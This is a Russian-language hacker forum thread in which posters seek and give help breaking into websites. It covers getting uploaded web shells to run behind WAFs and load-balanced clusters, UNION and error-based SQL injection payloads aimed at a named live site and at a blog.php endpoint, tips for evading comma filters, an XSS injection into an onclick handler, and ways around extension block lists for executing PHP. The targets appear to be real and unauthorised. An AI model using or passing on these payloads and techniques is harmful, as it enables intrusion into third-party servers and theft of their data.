Насколько я понял, обратное преобразование невозможно, только брут, но не могу найти брутер, поддерживающий эту функцию
где-то на ачате видел тему что именно так в адресной строке можно прописать проксю, должным образом сконфигурированную. и даже цепочку из проксей. а вот по поводу домена это да. видимо не получится. спасибо за ответ! об этом я как-то не подумал, мой багаж знаний к сожалению не велик.
возможно сайт на нескольких ip адресах, грузится рандомно, это делается для уменшения нагрузки. попробуйте открыть шелл через ip адрес, а не через доменное имя
если 404 появляется во время сабмита пароля (wso) то возможно это waf какой то, попробуйте загрузить другой шелл, или любой скрипт, анализируйте поведение сервера на разные файлы
Не плодите еретические мысли господа. Что за сайт для начала? Если это высоконагруженный проект - глянь какие IP привязаны к базовому домену. Если несколько штук и они обслуживают одно БАЗОВОЕ доменное имя - лезь в ГУГЛ и читай что такое масштабирование по принципу кластерной системы. Совершенно банальный случай для хайлоад проектов. К примеру облачные решения несмотря на свою распределенность совершенно прозрачны для клиента, хотя и тут все зависит от реализации. Тоесть залил ты шелл либо картинку - у тебя не будет фокусов подобных наблюдаемым. А вот когда имеет место кластер, то как раз и кидает тебя с одного IP на другой. С личной практики могу посоветовать искать директории которые прописаны в балансировщике как статичные, тоесть например есть условие для обработки PHP(допустим в этом случае и всех остальных) файлов(условий) - это условие общее. Но для частных типов файлов или же в каких то конкретных директориях - например директория заливки аватаров может иметь статичную адресацию и не балансироваться по кластеру или например filepath может браться с этой статичной директории а на обработку тому же FASTCGI уже на другой какой IP.
dle галерея. скуля в сортировке. кавычка экранируется слешем. помогите раскрутить?) форум дле поиск по топику тут ничего не фильтруется
http://odnadoma.ru/?part_id=500 ORDER BY 10 -- TRUE http://odnadoma.ru/?part_id=500 ORDER BY 1 -- FALSE http://odnadoma.ru/?part_id=500 UNION SELECT 1 -- ОТСОС В ЧЕМ ПРОБЛЕМА?
Такой вопосец .htaccess не пропускает файлы с таким разширением (tpl\.html|php|php3|php4|php5|phtml|pl|cgi) мб есть какиенибуть разширения исполняющие php код?
Просто нет вывода http://odnadoma.ru/?part_id=500+and+1=2+union+select+unhex(hex(123))+--+ UPD. Тут WAF прикольный кстати ) Фильтруются запятые, учти это.
Можно как-то раскрутить такую XSS Code: <a href="/forum/371629991/posts/2417')%7Balert('test');%7D?page=3" class="prev_page" onclick="new Ajax.Updater('comments', '/forum/371629991/posts/2417XSSHERE?page=3', { 'method': 'get', asynchronous:true, evalScripts:true }); return false;" rel="prev">…</a> В XSSHERE можно вставлять код, "/{} экранируется, ();' не экранируется.
нашел в плагинах браузера уязвимости через спецальный тул но не знаю как их выъявить. сервис показывает что есть 2 уязвимости но не говорит в каких. даже если нашел в каких, как можно найти где уязвимость? пс. как найти уязвимость в программном коде?
Есть уязвимость типа blog.php?id=1+OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(user(), 1, 63), FLOOR(RAND(0)*2))) -- ответ: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 6 нет вывода user(), что делать? Как раскрутить?
Спасибо, за помощь Пишу в уязвимости: blog.php?id=25628)and(select 1 from(select count(*),concat(concat(user()),floor(rand(0)*2))x from(select 1 union select 2 union select 3)z group by x)a) -- ответ: Every derived table must have its own alias что это может быть? как раскрутить?